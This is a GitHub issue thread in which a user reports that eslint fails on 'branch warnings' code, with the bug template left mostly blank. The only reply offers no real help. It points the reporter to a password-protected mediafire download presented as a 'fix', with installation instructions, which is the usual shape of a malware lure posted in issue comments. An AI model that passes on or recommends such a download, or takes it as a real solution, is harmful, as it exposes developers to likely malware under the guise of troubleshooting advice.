### ISSUE TITLE
eslint fails for "branch warnings"

### ISSUE THREAD

**Issue by burtonator** [hicommonwealth/commonwealth#8986]
## Describe the bug

eslint fails for branch warnings.  It works normally but just the branch warnings code fails.

### Initial conditions

**Environment:** 

**Branch/Release version:** 

**Browser:** 

**Wallet:**

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
